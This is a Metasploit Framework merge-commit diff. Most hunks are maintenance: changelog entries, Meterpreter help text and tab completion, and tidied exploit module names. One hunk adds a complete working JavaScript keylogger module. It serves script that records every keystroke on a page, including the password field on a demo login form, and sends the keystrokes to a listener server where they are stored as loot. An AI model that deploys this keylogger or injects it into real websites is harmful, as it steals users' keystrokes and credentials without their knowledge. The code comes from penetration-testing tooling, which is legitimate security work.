Merge branch 'master' of github.com:rapid7/metasploit-framework
commit
a288742376
Binary file not shown.
|
@ -1,6 +1,14 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
21 Feb 12
|
||||
---------
|
||||
- Added Cut/Copy/Paste menu to table cell editor.
|
||||
- Module browser search field now treats spaces as a wildcard. You may type:
|
||||
"win meterp" and Armitage will treat it as "win*meterp"
|
||||
- Hovering over an edge in graph view no longer reports a "null" tooltip
|
||||
- Fixed parsing of ps output for the process dialog (it's much much better now)
|
||||
|
||||
14 Feb 12
|
||||
---------
|
||||
- Added ports 5631 (pc anywhere) and 902 (vmauthd) to the MSF Scans feature.
|
||||
|
|
|
@ -28,7 +28,6 @@ class Db
|
|||
#
|
||||
def commands
|
||||
base = {
|
||||
"db_driver" => "Specify a database driver",
|
||||
"db_connect" => "Connect to an existing database",
|
||||
"db_disconnect" => "Disconnect from the current database instance",
|
||||
"db_status" => "Show the current database status",
|
||||
|
@ -1262,44 +1261,6 @@ class Db
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_db_driver(*args)
|
||||
|
||||
if(args[0])
|
||||
if(args[0] == "-h" || args[0] == "--help")
|
||||
print_status("Usage: db_driver [driver-name]")
|
||||
return
|
||||
end
|
||||
|
||||
if(framework.db.drivers.include?(args[0]))
|
||||
framework.db.driver = args[0]
|
||||
print_status("Using database driver #{args[0]}")
|
||||
else
|
||||
print_error("Invalid driver specified")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
if(framework.db.driver)
|
||||
print_status(" Active Driver: #{framework.db.driver}")
|
||||
else
|
||||
print_status("No Active Driver")
|
||||
end
|
||||
print_status(" Available: #{framework.db.drivers.join(", ")}")
|
||||
print_line("")
|
||||
|
||||
if ! framework.db.drivers.include?('postgresql')
|
||||
print_status(" DB Support: Enable the postgresql driver with the following command:")
|
||||
print_status(" * This requires libpq-dev and a build environment")
|
||||
print_status(" $ gem install postgres")
|
||||
print_status(" $ gem install pg # is an alternative that may work")
|
||||
print_line("")
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_db_driver_tabs(str, words)
|
||||
return framework.db.drivers
|
||||
end
|
||||
|
||||
def cmd_db_connect_help
|
||||
# Help is specific to each driver
|
||||
cmd_db_connect("-h")
|
||||
|
|
|
@ -109,7 +109,7 @@ class Console::CommandDispatcher::Core
|
|||
# Performs operations on the supplied channel.
|
||||
#
|
||||
def cmd_channel(*args)
|
||||
if args.include?("-h") or args.include?("--help")
|
||||
if args.empty? or args.include?("-h") or args.include?("--help")
|
||||
cmd_channel_help
|
||||
return
|
||||
end
|
||||
|
@ -180,14 +180,35 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_channel_tabs(str, words)
|
||||
case words.length
|
||||
when 1
|
||||
@@channel_opts.fmt.keys
|
||||
when 2
|
||||
case words[1]
|
||||
when "-c", "-i", "-r", "-w"
|
||||
tab_complete_channels
|
||||
else
|
||||
[]
|
||||
end
|
||||
else
|
||||
[]
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_close_help
|
||||
print_line "Usage: close <channel_id>"
|
||||
print_line
|
||||
print_line "Closes the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Closes a supplied channel.
|
||||
#
|
||||
def cmd_close(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: close channel_id\n\n" +
|
||||
"Closes the supplied channel.")
|
||||
cmd_close_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -204,6 +225,12 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_close_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
return tab_complete_channels
|
||||
end
|
||||
|
||||
#
|
||||
# Terminates the meterpreter session.
|
||||
#
|
||||
|
@ -216,6 +243,17 @@ class Console::CommandDispatcher::Core
|
|||
|
||||
alias cmd_quit cmd_exit
|
||||
|
||||
def cmd_detach_help
|
||||
print_line "Detach from the victim. Only possible for non-stream sessions (http/https)"
|
||||
print_line
|
||||
print_line "The victim will continue to attempt to call back to the handler until it"
|
||||
print_line "successfully connects (which may happen immediately if you have a handler"
|
||||
print_line "running in the background), or reaches its expiration."
|
||||
print_line
|
||||
print_line "This session may #{client.passive_service ? "" : "NOT"} be detached."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Disconnects the session
|
||||
#
|
||||
|
@ -228,14 +266,19 @@ class Console::CommandDispatcher::Core
|
|||
shell.stop
|
||||
end
|
||||
|
||||
def cmd_interact_help
|
||||
print_line "Usage: interact <channel_id>"
|
||||
print_line
|
||||
print_line "Interacts with the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Interacts with a channel.
|
||||
#
|
||||
def cmd_interact(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: interact channel_id\n\n" +
|
||||
"Interacts with the supplied channel.")
|
||||
cmd_info_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -251,6 +294,8 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
alias cmd_interact_tabs cmd_close_tabs
|
||||
|
||||
#
|
||||
# Runs the IRB scripting shell
|
||||
#
|
||||
|
@ -261,15 +306,20 @@ class Console::CommandDispatcher::Core
|
|||
Rex::Ui::Text::IrbShell.new(binding).run
|
||||
end
|
||||
|
||||
def cmd_migrate_help
|
||||
print_line "Usage: migrate <pid>"
|
||||
print_line
|
||||
print_line "Migrates the server instance to another process."
|
||||
print_line "NOTE: Any open channels or other dynamic state will be lost."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Migrates the server to the supplied process identifier.
|
||||
#
|
||||
def cmd_migrate(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: migrate pid\n\n" +
|
||||
"Migrates the server instance to another process.\n" +
|
||||
"Note: Any open channels or other dynamic state will be lost.")
|
||||
cmd_migrate_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -371,14 +421,19 @@ class Console::CommandDispatcher::Core
|
|||
alias cmd_use_help cmd_load_help
|
||||
alias cmd_use_tabs cmd_load_tabs
|
||||
|
||||
def cmd_read_help
|
||||
print_line "Usage: read <channel_id> [length]"
|
||||
print_line
|
||||
print_line "Reads data from the supplied channel."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Reads data from a channel.
|
||||
#
|
||||
def cmd_read(*args)
|
||||
if (args.length == 0)
|
||||
print_line(
|
||||
"Usage: read channel_id [length]\n\n" +
|
||||
"Reads data from the supplied channel.")
|
||||
cmd_read_help
|
||||
return true
|
||||
end
|
||||
|
||||
|
@ -402,6 +457,8 @@ class Console::CommandDispatcher::Core
|
|||
return true
|
||||
end
|
||||
|
||||
alias cmd_read_tabs cmd_close_tabs
|
||||
|
||||
def cmd_run_help
|
||||
print_line "Usage: run <script> [arguments]"
|
||||
print_line
|
||||
|
@ -669,17 +726,15 @@ class Console::CommandDispatcher::Core
|
|||
return true
|
||||
end
|
||||
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
def cmd_resource_help
|
||||
print_line "Usage: resource <path1> [path2 ...]"
|
||||
print_line
|
||||
print_line "Run the commands stored in the supplied files."
|
||||
print_line
|
||||
end
|
||||
|
||||
def cmd_resource(*args)
|
||||
if args.empty?
|
||||
print(
|
||||
"Usage: resource path1 path2" +
|
||||
"Run the commands stored in the supplied files.\n")
|
||||
return false
|
||||
end
|
||||
args.each do |glob|
|
||||
|
@ -710,6 +765,12 @@ class Console::CommandDispatcher::Core
|
|||
end
|
||||
end
|
||||
|
||||
def cmd_resource_tabs(str, words)
|
||||
return [] if words.length > 1
|
||||
|
||||
tab_complete_filenames(str, words)
|
||||
end
|
||||
|
||||
def cmd_enable_unicode_encoding
|
||||
client.encode_unicode = true
|
||||
print_status("Unicode encoding is enabled")
|
||||
|
@ -799,6 +860,10 @@ protected
|
|||
tabs.compact
|
||||
end
|
||||
|
||||
def tab_complete_channels
|
||||
client.channels.keys.map { |k| k.to_s }
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -0,0 +1,311 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Capture: HTTP JavaScript Keylogger',
|
||||
'Description' => %q{
|
||||
This modules runs a web server that demonstrates keystroke
|
||||
logging through JavaScript. The DEMO option can be set to enable
|
||||
a page that demonstrates this technique. Future improvements will
|
||||
allow for a configurable template to be used with this module.
|
||||
To use this module with an existing web page, simply add a
|
||||
script source tag pointing to the URL of this service ending
|
||||
in the .js extension. For example, if URIPATH is set to "test",
|
||||
the following URL will load this script into the calling site.
|
||||
http://server:port/test/anything.js
|
||||
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => ['Marcus J. Carey <mjc[at]threatagent.com>', 'hdm'],
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('DEMO', [true, "Creates HTML for demo purposes", false]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
# This is the module's main runtime method
|
||||
def run
|
||||
@seed = Rex::Text.rand_text_alpha(12)
|
||||
@client_cache = {}
|
||||
|
||||
# Starts Web Server
|
||||
exploit
|
||||
end
|
||||
|
||||
# This handles the HTTP responses for the Web server
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
cid = nil
|
||||
|
||||
if request['Cookie'].to_s =~ /,?\s*id=([a-f0-9]{4,32})/i
|
||||
cid = $1
|
||||
end
|
||||
|
||||
if not cid and request.qstring['id'].to_s =~ /^([a-f0-9]{4,32})/i
|
||||
cid = $1
|
||||
end
|
||||
|
||||
data = request.qstring['data']
|
||||
|
||||
unless cid
|
||||
cid = generate_client_id(cli,request)
|
||||
print_status("#{cli.peerhost} Assigning client identifier '#{cid}'")
|
||||
|
||||
resp = create_response(302, 'Moved')
|
||||
resp['Content-Type'] = 'text/html'
|
||||
resp['Location'] = request.uri + '?id=' + cid
|
||||
resp['Set-Cookie'] = "id=#{cid}"
|
||||
cli.send_response(resp)
|
||||
return
|
||||
end
|
||||
|
||||
base_url = generate_base_url(cli, request)
|
||||
|
||||
# print_status("#{cli.peerhost} [#{cid}] Incoming #{request.method} request for #{request.uri}")
|
||||
|
||||
case request.uri
|
||||
when /\.js(\?|$)/
|
||||
content_type = "text/plain"
|
||||
send_response(cli, generate_keylogger_js(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
|
||||
|
||||
when /\/demo\/?(\?|$)/
|
||||
if datastore['DEMO']
|
||||
content_type = "text/html"
|
||||
send_response(cli, generate_demo(base_url, cid), {'Content-Type'=> content_type, 'Set-Cookie' => "id=#{cid}"})
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
|
||||
else
|
||||
if data
|
||||
nice = process_data(cli, request, cid, data)
|
||||
script = datastore['DEMO'] ? generate_demo_js_reply(base_url, cid, nice) : ""
|
||||
send_response(cli, script, {'Content-Type' => "text/plain", 'Set-Cookie' => "id=#{cid}"})
|
||||
else
|
||||
if datastore['DEMO']
|
||||
send_redirect(cli, "/demo/?cid=#{cid}")
|
||||
else
|
||||
send_not_found(cli)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Figure out what our base URL is based on the user submitted
|
||||
# Host header or the address of the client.
|
||||
def generate_base_url(cli, req)
|
||||
port = nil
|
||||
host = Rex::Socket.source_address(cli.peerhost)
|
||||
|
||||
if req['Host']
|
||||
host = req['Host']
|
||||
bits = host.split(':')
|
||||
|
||||
# Extract the hostname:port sequence from the Host header
|
||||
if bits.length > 1 and bits.last.to_i > 0
|
||||
port = bits.pop.to_i
|
||||
host = bits.join(':')
|
||||
end
|
||||
else
|
||||
port = datastore['SRVPORT'].to_i
|
||||
end
|
||||
|
||||
prot = (!! datastore['SSL']) ? 'https://' : 'http://'
|
||||
if Rex::Socket.is_ipv6?(host)
|
||||
host = "[#{host}]"
|
||||
end
|
||||
|
||||
base = prot + host
|
||||
if not ((prot == 'https' and port.nil?) or (prot == 'http' and port.nil?))
|
||||
base << ":#{port}"
|
||||
end
|
||||
|
||||
base << get_resource
|
||||
end
|
||||
|
||||
def process_data(cli, request, cid, data)
|
||||
|
||||
lines = [""]
|
||||
real = ""
|
||||
|
||||
Rex::Text.uri_decode(data).split(",").each do |char|
|
||||
byte = char.to_s.hex.chr
|
||||
next if byte == "\x00"
|
||||
real << byte
|
||||
case char.to_i
|
||||
# Do Backspace
|
||||
when 8
|
||||
lines[-1] = lines[-1][0, lines[-1].length - 1] if lines[-1].length > 0
|
||||
when 13
|
||||
lines << ""
|
||||
else
|
||||
lines[-1] << byte
|
||||
end
|
||||
end
|
||||
|
||||
nice = lines.join("<CR>").gsub("\t", "<TAB>")
|
||||
real = real.gsub("\x08", "<DEL>")
|
||||
|
||||
if not @client_cache[cid]
|
||||
|
||||
fp = fingerprint_user_agent(request['User-Agent'] || "")
|
||||
header = "Browser Keystroke Log\n"
|
||||
header << "=====================\n"
|
||||
header << "Created: #{Time.now.to_s}\n"
|
||||
header << "Address: #{cli.peerhost}\n"
|
||||
header << " ID: #{cid}\n"
|
||||
header << " FPrint: #{fp.inspect}\n"
|
||||
header << " URL: #{request.uri}\n"
|
||||
header << "\n"
|
||||
header << "====================\n\n"
|
||||
|
||||
@client_cache[cid] = {
|
||||
:created => Time.now.to_i,
|
||||
:path_clean => store_loot("browser.keystrokes.clean", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Clean)"),
|
||||
:path_raw => store_loot("browser.keystrokes.raw", "text/plain", cli.peerhost, header, "keystrokes_clean_#{cid}.txt", "Browser Keystroke Logs (Raw)")
|
||||
}
|
||||
print_good("#{cli.peerhost} [#{cid}] Logging clean keystrokes to: #{@client_cache[cid][:path_clean]}")
|
||||
print_good("#{cli.peerhost} [#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("#{cli.peerhost} [#{cid}] Keys: #{nice}")
|
||||
end
|
||||
|
||||
nice
|
||||
end
|
||||
|
||||
def generate_client_id(cli, req)
|
||||
"%.8x" % Kernel.rand(0x100000000)
|
||||
end
|
||||
|
||||
|
||||
def generate_demo(base_url, cid)
|
||||
# This is the Demo Form Page <HTML>
|
||||
html = <<EOS
|
||||
<html>
|
||||
<head>
|
||||
<title>Demo Form</title>
|
||||
<script type="text/javascript" src="#{base_url}/#{@seed}.js?id=#{cid}"></script>
|
||||
</head>
|
||||
<body bgcolor="white">
|
||||
<br><br>
|
||||
<div align="center">
|
||||
<h1>Keylogger Demo Form</h1>
|
||||
<form method=\"POST\" name=\"logonf\" action=\"#{base_url}/demo/?id=#{cid}\">
|
||||
<p><font color="red"><i>This form submits data to the Metasploit listener for demonstration purposes.</i></font>
|
||||
<br><br>
|
||||
<table border="0" cellspacing="0" cellpadding="0">
|
||||
<tr><td>Username:</td> <td><input name="username" size="20"></td> </tr>
|
||||
<tr><td>Password:</td> <td><input type="password" name="password" size="20"></td> </tr>
|
||||
</table>
|
||||
<p align="center"><input type="submit" value="Submit"></p></form>
|
||||
|
||||
<br/>
|
||||
<textarea cols="80" rows="5" id="results">
|
||||
</textarea>
|
||||
|
||||
</div>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
return html
|
||||
end
|
||||
|
||||
# This is the JavaScript Key Logger Code
|
||||
def generate_keylogger_js(base_url, cid)
|
||||
|
||||
targ = Rex::Text.rand_text_alpha(12)
|
||||
|
||||
code = <<EOS
|
||||
|
||||
var c#{@seed} = 0;
|
||||
window.onload = function load#{@seed}(){
|
||||
l#{@seed} = ",";
|
||||
|
||||
if (window.addEventListener) {
|
||||
document.addEventListener('keypress', p#{@seed}, true);
|
||||
document.addEventListener('keydown', d#{@seed}, true);
|
||||
} else if (window.attachEvent) {
|
||||
document.attachEvent('onkeypress', p#{@seed});
|
||||
document.attachEvent('onkeydown', d#{@seed});
|
||||
} else {
|
||||
document.onkeypress = p#{@seed};
|
||||
document.onkeydown = d#{@seed};
|
||||
}
|
||||
|
||||
}
|
||||
function p#{@seed}(e){
|
||||
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
|
||||
k#{@seed} = k#{@seed}.toString(16);
|
||||
if (k#{@seed} != "d"){
|
||||
#{@seed}(k#{@seed});
|
||||
}
|
||||
}
|
||||
function d#{@seed}(e){
|
||||
k#{@seed} = (window.event) ? window.event.keyCode : e.which;
|
||||
if (k#{@seed} == 9 || k#{@seed} == 8 || k#{@seed} == 13){
|
||||
#{@seed}(k#{@seed});
|
||||
}
|
||||
}
|
||||
|
||||
function #{@seed}(k#{@seed}){
|
||||
l#{@seed} = l#{@seed} + k#{@seed} + ",";
|
||||
|
||||
var t#{@seed} = "#{targ}" + c#{@seed};
|
||||
c#{@seed}++;
|
||||
|
||||
var f#{@seed};
|
||||
|
||||
if (document.all)
|
||||
f#{@seed} = document.createElement("<script name='" + t#{@seed} + "' id='" + t#{@seed} + "'></script>");
|
||||
else {
|
||||
f#{@seed} = document.createElement("script");
|
||||
f#{@seed}.setAttribute("id", t#{@seed});
|
||||
f#{@seed}.setAttribute("name", t#{@seed});
|
||||
}
|
||||
|
||||
f#{@seed}.setAttribute("src", "#{base_url}?id=#{cid}&data=" + l#{@seed});
|
||||
f#{@seed}.style.visibility = "hidden";
|
||||
|
||||
document.body.appendChild(f#{@seed});
|
||||
|
||||
if (k#{@seed} == 13 || l#{@seed}.length > 3000)
|
||||
l#{@seed} = ",";
|
||||
|
||||
setTimeout('document.body.removeChild(document.getElementById("' + t#{@seed} + '"))', 5000);
|
||||
}
|
||||
EOS
|
||||
return code
|
||||
end
|
||||
|
||||
def generate_demo_js_reply(base_url, cid, data)
|
||||
code = <<EOS
|
||||
try {
|
||||
document.getElementById("results").value = "Keystrokes: #{data}";
|
||||
} catch(e) { }
|
||||
EOS
|
||||
return code
|
||||
end
|
||||
|
||||
|
||||
|
||||
end
|
||||
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => 'PmWiki <= 2.2.34 (pagelist) Remote PHP Code Execution',
|
||||
'Name' => 'PmWiki <= 2.2.34 pagelist.php Remote PHP Code Injection Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability
|
||||
in PmWiki from 2.0.0 to 2.2.34. The vulnerable function is
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'vBSEO <= 3.6.0 "proc_deutf()" Remote PHP Code Injection',
|
||||
'Name' => 'vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the 'proc_deutf()' function
|
||||
defined in /includes/functions_vbseocp_abstract.php. User input passed through
|
||||
|
|
|
@ -24,14 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mozilla Firefox 3.6.16 mChannel use after free vulnerability',
|
||||
'Name' => 'Mozilla Firefox 3.6.16 mChannel Use-After-Free',
|
||||
'Description' => %q{
|
||||
This module exploits a use-after-free vulnerability in Mozilla
|
||||
Firefox 3.6.16. An OBJECT Element mChannel can be freed via the
|
||||
Firefox 3.6.16. An OBJECT element, mChannel, can be freed via the
|
||||
OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel
|
||||
becomes a dangling pointer and can be reused when setting the OBJECTs
|
||||
data attribute. (Discovered by regenrecht). Mac OS X version by argp,
|
||||
tested on Mac OS X 10.6.6, 10.6.7, 10.6.8, 10.7.2 and 10.7.3.
|
||||
data attribute. This module has been tested on Mac OS X 10.6.6, 10.6.7,
|
||||
10.6.8, 10.7.2 and 10.7.3.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCMPlayer 1.5 Stack based Buffer Overflow (.m3u)',
|
||||
'Name' => 'CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening
|
||||
a m3u playlist with a long track name, a SEH exception record can be overwritten
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
|
||||
'Name' => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow found in Free MP3 CD
|
||||
Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
|
||||
'Name' => 'Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
|
||||
Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)',
|
||||
'Name' => 'AbsoluteFTP 1.9.6 - 2.2.10 LIST Command Remote Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits VanDyke Software AbsoluteFTP by overflowing
|
||||
a filename buffer related to the LIST command.
|
||||
|
|
|
@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Serv-U FTP Server <4.2 Buffer Overflow',
|
||||
'Name' => 'Serv-U FTP Server < 4.2 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in the site chmod command
|
||||
in versions of Serv-U FTP Server prior to 4.2.
|
||||
|
|
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'StreamDown 6.8.0 Buffer overflow',
|
||||
'Name' => 'StreamDown 6.8.0 Buffer Overflow',
|
||||
'Description' => %q{
|
||||
Stream Down 6.8.0 seh based buffer overflow triggered when processing
|
||||
the server reponse packet.During the overflow a structured exception
|
||||
|
|
|
@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "Wireshark console.lua pre-loading vulnerability",
|
||||
'Name' => "Wireshark console.lua Pre-Loading Script Execution",
|
||||
'Description' => %q{
|
||||
This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a
|
||||
pcap file, Wireshark will actually check if there's a 'console.lua' file in the same
|
||||
|
@ -335,4 +335,4 @@ But on a fully patched XP SP3, the same URI format will not work. Windows will t
|
|||
the share via SMB, and the victim will not see the share. In this case, you should specify
|
||||
the URI to like this:
|
||||
http://192.168.1.11/files
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Gather RazorSQL credentials',
|
||||
'Name' => 'Windows Gather RazorSQL Credentials',
|
||||
'Description' => %q{
|
||||
This module stores username, password, type, host, port, database (and name)
|
||||
collected from profiles.txt of RazorSQL.
|
||||
|
@ -154,4 +154,4 @@ end
|
|||
=begin
|
||||
http://www.razorsql.com/download.html
|
||||
Tested on: v5.6.2 (win32)
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
'Name' => 'Windows Disconnect Wireless Connection ',
|
||||
'Name' => 'Windows Disconnect Wireless Connection',
|
||||
'Description' => %q{
|
||||
This module disconnects the current wireless network connection
|
||||
on the specified interface.
|
||||
|
|
Loading…
Reference in New Issue